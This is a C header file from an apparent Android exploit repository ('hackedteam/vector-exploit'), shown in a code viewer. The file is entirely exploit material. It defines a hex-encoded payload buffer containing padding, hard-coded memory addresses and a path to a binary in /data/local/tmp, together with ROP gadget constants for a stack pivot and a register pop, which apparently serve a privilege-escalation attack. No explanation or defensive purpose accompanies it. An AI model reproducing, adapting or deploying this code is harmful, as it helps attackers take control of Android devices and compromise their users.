hackedteam/vector-exploit

View on GitHub
src/ht-android-shellcode/shared_object_eop/jni/install.h

Summary

Maintainability
Test Coverage
char payload[] = "\x41\x53\x44\x46\x20\x58\x58\x20\x57\x51\xd2\xaf\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x58\x58\x58\x58\x20\x88\x71\x01\x00\xf4\x9c\x11\x40\x88\x71\x01\x20\x4f\x56\x45\x52\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x58\x58\x58\x58\x58\x58\x58\x58\x7f\x92\xd3\xaf\x7b\x9d\x11\x40\xe9\x7f\xd1\xaf\x58\x58\x58\x58\x2f\x64\x61\x74\x61\x2f\x6c\x6f\x63\x61\x6c\x2f\x74\x6d\x70\x2f\x74\x65\x73\x74";

static char *bsh = "/data/local/tmp/test";
uint32_t final_stack_pivot = 0xafd25157;
uint32_t final_pop_r0 = 0xafd3927f;